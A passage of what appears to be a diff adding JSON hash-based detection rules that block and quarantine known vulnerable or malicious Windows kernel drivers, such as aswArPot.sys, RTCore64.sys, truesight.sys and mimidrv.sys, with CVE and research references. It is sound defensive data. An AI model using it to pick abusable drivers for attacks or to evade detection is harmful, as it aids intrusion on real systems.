+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e90c0e7-85c0-5c0a-832f-223bc393b7ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816822Z",
+ "creation_date": "2026-03-23T11:45:30.816824Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816829Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9c8ed1506b3e35f5eea6ac539e286d46ef76ddbfdfc5406390fd2157c762ce91",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e9250a7-4ec4-559f-931c-7ee140b70ac0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969023Z",
+ "creation_date": "2026-03-23T11:45:29.969025Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969031Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9a54ef5cfbe6db599322967ee2c84db7daabcb468be10a3ccfcaa0f64d9173c7",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e99231f-af8c-5d56-a1d0-7d7f6093ceb5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.607363Z",
+ "creation_date": "2026-03-23T11:45:29.607365Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.607371Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f1c8ca232789c2f11a511c8cd95a9f3830dd719cad5aa22cb7c3539ab8cb4dc3",
+ "comment": "Micro-Star MSI Afterburner vulnerable driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e9c3a54-0e10-538a-82de-e3032a1c614a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820177Z",
+ "creation_date": "2026-03-23T11:45:30.820180Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820185Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b3183d87a902db1bbdaecb37291b9d37c032ce9dfacbe4b36cc3032f5a643ab4",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3e9f797b-090f-586b-a677-43351c2e9c20",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807587Z",
+ "creation_date": "2026-03-23T11:45:31.807589Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807594Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c21e6134ea6ceb167984d7989f5a65425d7397907c79294dc4683b9785c9cc42",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ebb4ca2-6fdc-5a27-ae9e-0ee83186828a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159810Z",
+ "creation_date": "2026-03-23T11:45:31.159812Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159817Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "98fcf8d6b7f61a3644566eb4ed699f7813a0aad1beb3ac7cf86b1f8aab412667",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ebb736b-9353-5fad-9e61-f0929ad170c7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480941Z",
+ "creation_date": "2026-03-23T11:45:30.480943Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480956Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e34afe0a8c5459d13e7a11f20d62c7762b2a55613aaf6dbeb887e014b5f19295",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ec6cce2-1c16-5ed1-9480-7ed8a899416d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.500416Z",
+ "creation_date": "2026-03-23T11:45:31.500419Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.500427Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "274c3fe5b6f2c2ff285b7c9e3820d18d1e262cd62006d83f1547644c45ae58aa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ecc6f02-b25f-5fa7-9028-60ce0151e454",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811850Z",
+ "creation_date": "2026-03-23T11:45:31.811852Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811858Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b8ffe85d27244973559ee995f28e9a820a36916a1e89621ed5062cfe90d9efb3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3edadbfd-9720-58f0-afa7-ef69159fcf1b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454651Z",
+ "creation_date": "2026-03-23T11:45:30.454655Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454664Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7db320e49139f636c8b6d12b6c78b666a62599e9d59587ba87c6b89b0a34b18d",
+ "comment": "Vulnerable Kernel Driver (aka inpout32.sys) [https://www.loldrivers.io/drivers/97fa88f6-3819-4d56-a82c-52a492a9e2b5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3edb0957-a5e0-5eea-9b12-9cf1deb3dc83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147413Z",
+ "creation_date": "2026-03-23T11:45:31.147415Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "19df09d385b0520c193171b372de92b13a008b7d1c74f8595e4ad3c867167e18",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3edf284f-db64-5b54-ba83-1d0f2dc13dde",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475301Z",
+ "creation_date": "2026-03-23T11:45:30.475304Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475313Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6d7faddc3a56875a8d24e4785a139141dd892968f70bf0e37d505af9a3324fd",
+ "comment": "Vulnerable Kernel Driver (aka jokercontroller.sys) [https://www.loldrivers.io/drivers/4c815256-2534-4476-b15d-7cbf24c80098/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3eeaae41-f11c-59b5-92c6-72d7e858dcbd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.462890Z",
+ "creation_date": "2026-03-23T11:45:30.462893Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.462902Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "bc49cb96f3136c3e552bf29f808883abb9e651040415484c1736261b52756908",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3eebb93b-0cd2-5471-be03-4708539339d4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.141523Z",
+ "creation_date": "2026-03-23T11:45:31.141525Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.141531Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d739cc6794bae0f69c7f92d7441809484bf9bb8537291501e1e9475f9b0016e1",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3ef99461-ac78-507a-b681-86bba9679fae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.604555Z",
+ "creation_date": "2026-03-23T11:45:29.604557Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.604563Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e330de98db81f9b183ef37d31e111301da669f1fc572e87acf8b8c2fe4e602b5",
+ "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f07d1c6-173d-5d42-990f-6a7974993426",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.484974Z",
+ "creation_date": "2026-03-23T11:45:31.484977Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.484987Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b4005dfd853850dfa2560a6bbe94a22280d246e9d6cc23dff0c974eaa35e493",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f1dbd0d-d402-5a8c-ad3a-6f68a7da874e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147059Z",
+ "creation_date": "2026-03-23T11:45:31.147061Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147066Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8b2946c1805b365e2df58ed29cc0b77dd2afd2ea991621ae02dfaa5ceb4ba091",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f21316d-36dd-5908-8a11-8c4b5b65e80e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.969947Z",
+ "creation_date": "2026-03-23T11:45:29.969950Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.969955Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e309324897edf07776adbb2b05252d7a2ad8140c6636bc28a5050e4ea183d40",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f3590d4-d9ae-5a8d-ab69-db72acfa76f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467090Z",
+ "creation_date": "2026-03-23T11:45:30.467094Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fc26cebb27c76c6e3d22da679cff81477cab4fcabfb6f5a8a27f596ab51713ae",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f37586b-5081-5ff4-a0b7-b987f51a43eb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610672Z",
+ "creation_date": "2026-03-23T11:45:29.610674Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610679Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "955dac77a0148e9f9ed744f5d341cb9c9118261e52fe622ac6213965f2bc4cad",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f4b8ba5-d866-5f3d-879f-5c792a75e676",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161010Z",
+ "creation_date": "2026-03-23T11:45:31.161013Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161022Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a8d3cc4e735124bbfe5187cf1b29305a77411ffd76c340b2d83497febb791a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f4c553b-3825-5c61-85ee-af0677a6d51c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.816937Z",
+ "creation_date": "2026-03-23T11:45:30.816939Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.816951Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "054f04dc0ba1b20701c6f44169ea0fdd27b01a8450a44cc273b0eb0c91cbdb68",
+ "comment": "Vulnerable Kernel Driver (aka CP2X72C.SYS) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "3f4e3f34-478e-5d3e-96fe-8f9f4f4aa8d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
